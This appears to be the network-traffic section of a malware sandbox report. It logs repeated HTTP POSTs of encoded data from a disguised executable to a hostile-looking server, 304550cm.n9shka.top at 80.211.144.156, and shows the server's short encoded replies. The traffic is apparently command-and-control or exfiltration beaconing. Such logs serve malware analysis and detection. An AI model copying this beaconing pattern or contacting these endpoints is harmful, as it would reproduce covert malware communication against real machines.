                                                          Date: Sun, 08 Sep 2024 09:53:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.4 | 64811 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:44.550465107 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:45.217216015 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:45.344563007 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.4 | 64812 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:45.467611074 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:46.141524076 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:46.346350908 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.4 | 64813 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:46.495265961 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.4 | 64814 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:46.596179008 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1388
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:47.275499105 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:47.411120892 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 57 24 06 2e 00 36 10 38 0c 3d 06 2e 0f 39 3d 06 59 3e 3a 2a 1b 3d 23 3b 0b 29 11 31 03 3e 3b 21 45 2a 2c 3c 12 34 57 30 01 26 35 28 5e 03 11 20 02 21 00 39 06 3e 2a 3d 02 3e 1f 2f 05 2a 01 0d 11 21 24 06 52 20 28 20 5a 23 5e 25 0b 3f 07 22 1c 2f 27 2a 19 2d 33 2d 08 36 24 2d 57 0c 12 20 50 28 07 3c 08 23 33 21 5f 25 2d 29 59 24 18 04 5e 3d 06 29 09 28 16 08 59 26 0b 34 0e 30 13 2d 58 3e 2b 2a 5f 26 3a 33 5a 23 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &W$.68=.9=Y>:*=#;)1>;!E*,<4W0&5(^ !9>*=>/*!$R ( Z#^%?"/'*-3-6$-W P(<#3!_%-)Y$^=)(Y&40-X>+*_&:3Z#-$S-"T=\V


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          125 | 192.168.2.4 | 64815 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:46.720159054 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:47.072067022 CEST | 2532 | OUT | Data Raw: 5e 5e 5c 52 5a 5b 5b 50 5c 5a 51 56 57 59 57 55 50 5c 5e 58 54 59 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\RZ[[P\ZQVWYWUP\^XTYSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,!.?*7! ,)7Y0?&/'+'"=Z+0$78^9#G X/)
                                                          Sep 8, 2024 11:53:47.391052008 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:47.520620108 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          126 | 192.168.2.4 | 64816 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:47.655071020 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:48.010149956 CEST | 2532 | OUT | Data Raw: 5b 5d 5c 51 5a 5f 5b 5a 5c 5a 51 56 57 5f 57 54 50 5b 5e 5d 54 5d 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\QZ_[Z\ZQVW_WTP[^]T]SDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,"-]>9 ! (? 3<=\8U0);65Z(5'_378[9#G X/1
                                                          Sep 8, 2024 11:53:48.348093987 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:48.482502937 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          127 | 192.168.2.4 | 64817 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:48.612793922 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:48.962723970 CEST | 2532 | OUT | Data Raw: 5b 5b 5c 53 5f 5d 5e 5a 5c 5a 51 56 57 5f 57 5c 50 59 5e 5b 54 5e 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[\S_]^Z\ZQVW_W\PY^[T^SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_81)>_'4?)Z/]3<=_;U0?">%(?_&7/-#G X/1
                                                          Sep 8, 2024 11:53:49.279827118 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:49.479976892 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          128 | 192.168.2.4 | 64818 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:49.604969978 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:49.962701082 CEST | 2532 | OUT | Data Raw: 5e 5e 59 51 5a 53 5e 5d 5c 5a 51 56 57 52 57 54 50 5e 5e 51 54 55 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^YQZS^]\ZQVWRWTP^^QTUSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^,1=9+4# Y)'_$8$+S%)#.6+('$(\-;#G X/
                                                          Sep 8, 2024 11:53:50.298108101 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:50.432838917 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          129 | 192.168.2.4 | 64819 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:50.563951969 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:50.915904999 CEST | 2532 | OUT | Data Raw: 5b 5a 59 56 5a 5f 5e 5d 5c 5a 51 56 57 52 57 54 50 5a 5e 51 54 5a 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [ZYVZ_^]\ZQVWRWTPZ^QTZSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%82%*:#X#3,]*,$'?"/7<'"=>)&#X'^/+#G X/
                                                          Sep 8, 2024 11:53:51.249217987 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:51.384736061 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          130 | 192.168.2.4 | 64820 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:51.514620066 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:51.870373964 CEST | 2532 | OUT | Data Raw: 5b 5d 5c 56 5f 5e 5b 5c 5c 5a 51 56 57 5d 57 56 50 5e 5e 5f 54 58 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\V_^[\\ZQVW]WVP^^_TXSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%];=(70<Z*? 0?%Z/R$95=X<6' -+#G X/9
                                                          Sep 8, 2024 11:53:52.211961985 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:52.350106001 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          131 | 192.168.2.4 | 64821 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:52.424175978 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          132 | 192.168.2.4 | 64822 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:52.564677000 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:52.915919065 CEST | 2532 | OUT | Data Raw: 5b 59 59 52 5f 5f 5b 51 5c 5a 51 56 57 5a 57 5d 50 50 5e 5e 54 5b 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [YYR__[Q\ZQVWZW]PP^^T[SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,9) !#,*<3)];'?S%:7!X*(&3$'4[:;#G X/%
                                                          Sep 8, 2024 11:53:53.241549015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:53.364639997 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          133 | 192.168.2.4 | 64823 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:53.496387005 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:53.857218981 CEST | 2532 | OUT | Data Raw: 5e 5d 59 55 5a 59 5b 50 5c 5a 51 56 57 52 57 57 50 5e 5e 51 54 5c 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]YUZY[P\ZQVWRWWP^^QT\SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\/1->+Y4 =,+]'=\88'6>)^? $+9#G X/
                                                          Sep 8, 2024 11:53:54.171480894 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:54.372788906 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          134 | 192.168.2.4 | 64824 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:54.497406006 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:54.853415966 CEST | 2532 | OUT | Data Raw: 5b 5d 59 52 5a 5c 5e 58 5c 5a 51 56 57 59 57 51 50 5b 5e 5d 54 5e 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []YRZ\^X\ZQVWYWQP[^]T^SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/!=)#3$\=<,0/28 '_;"1(&0'7-#G X/)
                                                          Sep 8, 2024 11:53:55.161540985 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:55.357681036 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          135 | 192.168.2.4 | 64825 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:55.481784105 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:55.838398933 CEST | 2532 | OUT | Data Raw: 5e 5e 5c 52 5a 52 5e 5f 5c 5a 51 56 57 5c 57 57 50 50 5e 5e 54 5c 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\RZR^_\ZQVW\WWPP^^T\SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%8=,!0<X=/00&84U3:?6>!Y(%3^'$'9;#G X/
                                                          Sep 8, 2024 11:53:56.156924963 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:56.476120949 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z
                                                          Sep 8, 2024 11:53:56.509809971 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          136 | 192.168.2.4 | 64826 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:56.641725063 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:56.993968964 CEST | 2532 | OUT | Data Raw: 5b 5b 59 53 5a 5a 5b 5f 5c 5a 51 56 57 5f 57 53 50 5a 5e 5a 54 59 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[YSZZ[_\ZQVW_WSPZ^ZTYSCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&812=*44)(0<5/70)8".=Z?&;'4-;#G X/1
